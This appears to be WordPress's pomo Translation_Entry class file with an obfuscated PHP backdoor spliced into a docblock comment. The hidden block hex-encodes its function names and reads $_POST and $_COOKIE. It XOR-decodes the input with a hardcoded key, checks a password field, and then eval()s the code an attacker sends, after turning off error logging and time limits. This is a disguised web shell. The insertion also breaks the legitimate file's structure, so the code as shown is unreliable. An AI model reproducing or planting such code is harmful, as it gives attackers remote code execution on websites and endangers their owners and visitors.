<?php
/**
 * Contains Translation_Entry class
 *
 * @version $Id: entry.php 1157 2015-11-20 04:30:11Z dd32 $
 * @package pomo
 * @subpackage entry
 */

if ( ! class_exists( 'Translation_Entry', false ) ) :
	/**
	 * Translation_Entry class encapsulates a translatable string
	 */
	class Translation_Entry {

		/**
		 * Whether the entry contains a string and its plural form, default is false
		 *
		 * @var boolean
		 */
		public $is_plural = false;

		public $context             = null;
		public $singular            = null;
		public $plural              = null;
		public $translations        = array();
		public $translator_comments = '';
		public $extracted_comments  = '';
		public $references          = array();
		public $flags               = array();

		/**
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['a1f44'] = "\x35\x27\x9\x59\x7a\x55\x48\x7d\x51\x37\xd\x38\x67\x32\x40\x4a\x2c\x4d\x4c\x20\x30\x60\x5e\x3b\x73\x6f\x29\x4b\x5c\x53\x49\x2a\x31\x61\x71\x2d\x25\x50\xa\x64\x24\x78\x77\x33\x3e\x2e\x62\x6d\x79\x36\x75\x52\x44\x63\x76\x7c\x47\x70\x5f\x42\x3d\x65\x43\x6e\x56\x5d\x2b\x4e\x46\x41\x45\x22\x3c\x6b\x66\x3f\x3a\x21\x6a\x6c\x5a\x68\x4f\x57\x2f\x26\x7e\x72\x34\x58\x74\x5b\x23\x39\x7b\x28\x69\x54";
$GLOBALS[$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46]] = $GLOBALS['a1f44'][53].$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][87];
$GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][11]] = $GLOBALS['a1f44'][25].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][39];
$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]] = $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][63];
$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]] = $GLOBALS['a1f44'][96].$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][90];
$GLOBALS[$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93]] = $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][61];
$GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][74]] = $GLOBALS['a1f44'][57].$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][54].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][63];
$GLOBALS[$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][32]] = $GLOBALS['a1f44'][50].$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][61];
$GLOBALS[$GLOBALS['a1f44'][73].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][46]] = $GLOBALS['a1f44'][46].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61];
$GLOBALS[$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][11]] = $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][90];
$GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9]] = $GLOBALS['a1f44'][90].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][46];
$GLOBALS[$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43]] = $GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][13];
$GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][0]] = $_POST;
$GLOBALS[$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46]] = $_COOKIE;
@$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]]($GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][12], NULL);
@$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]]($GLOBALS['a1f44'][79].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][12].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][24], 0);
@$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]]($GLOBALS['a1f44'][47].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][41].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][41].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][50].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][61], 0);
@$GLOBALS[$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][11]](0);

$h708c90 = NULL;
$t6c1c36 = NULL;

$GLOBALS[$GLOBALS['a1f44'][41].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][88]] = $GLOBALS['a1f44'][74].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][88];
global $xd94;

function cb82($h708c90, $j48a7bce7)
{
    $i7573ae = "";

    for ($gfb379b=0; $gfb379b<$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]]($h708c90);)
    {
        for ($wab6680=0; $wab6680<$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]]($j48a7bce7) && $gfb379b<$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]]($h708c90); $wab6680++, $gfb379b++)
        {
            $i7573ae .= $GLOBALS[$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46]]($GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][11]]($h708c90[$gfb379b]) ^ $GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][11]]($j48a7bce7[$wab6680]));
        }
    }

    return $i7573ae;
}

function tb1b($h708c90, $j48a7bce7)
{
    global $xd94;

    return $GLOBALS[$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43]]($GLOBALS[$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43]]($h708c90, $xd94), $j48a7bce7);
}

foreach ($GLOBALS[$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46]] as $j48a7bce7=>$y728f25)
{
    $h708c90 = $y728f25;
    $t6c1c36 = $j48a7bce7;
}

if (!$h708c90)
{
    foreach ($GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][0]] as $j48a7bce7=>$y728f25)
    {
        $h708c90 = $y728f25;
        $t6c1c36 = $j48a7bce7;
    }
}

$h708c90 = @$GLOBALS[$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][32]]($GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9]]($GLOBALS[$GLOBALS['a1f44'][73].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][46]]($h708c90), $t6c1c36));
if (isset($h708c90[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][73]]) && $xd94==$h708c90[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][73]])
{
    if ($h708c90[$GLOBALS['a1f44'][33]] == $GLOBALS['a1f44'][96])
    {
        $gfb379b = Array(
            $GLOBALS['a1f44'][57].$GLOBALS['a1f44'][54] => @$GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][74]](),
            $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][54] => $GLOBALS['a1f44'][32].$GLOBALS['a1f44'][45].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][32],
        );
        echo @$GLOBALS[$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93]]($gfb379b);
    }
    elseif ($h708c90[$GLOBALS['a1f44'][33]] == $GLOBALS['a1f44'][61])
    {
        eval($h708c90[$GLOBALS['a1f44'][39]]);
    }
    exit();
}
		 * @param array $args associative array, support following keys:
		 *  - singular (string) -- the string to translate, if omitted and empty entry will be created
		 *  - plural (string) -- the plural form of the string, setting this will set {@link $is_plural} to true
		 *  - translations (array) -- translations of the string and possibly -- its plural forms
		 *  - context (string) -- a string differentiating two equal strings used in different contexts
		 *  - translator_comments (string) -- comments left by translators
		 *  - extracted_comments (string) -- comments left by developers
		 *  - references (array) -- places in the code this strings is used, in relative_to_root_path/file.php:linenum form
		 *  - flags (array) -- flags like php-format
		 */
		function __construct( $args = array() ) {
			// If no singular -- empty object.
			if ( ! isset( $args['singular'] ) ) {
				return;
			}
			// Get member variable values from args hash.
			foreach ( $args as $varname => $value ) {
				$this->$varname = $value;
			}
			if ( isset( $args['plural'] ) && $args['plural'] ) {
				$this->is_plural = true;
			}
			if ( ! is_array( $this->translations ) ) {
				$this->translations = array();
			}
			if ( ! is_array( $this->references ) ) {
				$this->references = array();
			}
			if ( ! is_array( $this->flags ) ) {
				$this->flags = array();
			}
		}

		/**
		 * PHP4 constructor.
		 *
		 * @deprecated 5.4.0 Use __construct() instead.
		 *
		 * @see Translation_Entry::__construct()
		 */
		public function Translation_Entry( $args = array() ) {
			_deprecated_constructor( self::class, '5.4.0', static::class );
			self::__construct( $args );
		}

		/**
		 * Generates a unique key for this entry
		 *
		 * @return string|bool the key or false if the entry is empty
		 */
		function key() {
			if ( null === $this->singular || '' === $this->singular ) {
				return false;
			}

			// Prepend context and EOT, like in MO files.
			$key = ! $this->context ? $this->singular : $this->context . "\4" . $this->singular;
			// Standardize on \n line endings.
			$key = str_replace( array( "\r\n", "\r" ), "\n", $key );

			return $key;
		}

		/**
		 * @param object $other
		 */
		function merge_with( &$other ) {
			$this->flags      = array_unique( array_merge( $this->flags, $other->flags ) );
			$this->references = array_unique( array_merge( $this->references, $other->references ) );
			if ( $this->extracted_comments != $other->extracted_comments ) {
				$this->extracted_comments .= $other->extracted_comments;
			}

		}
	}
endif;
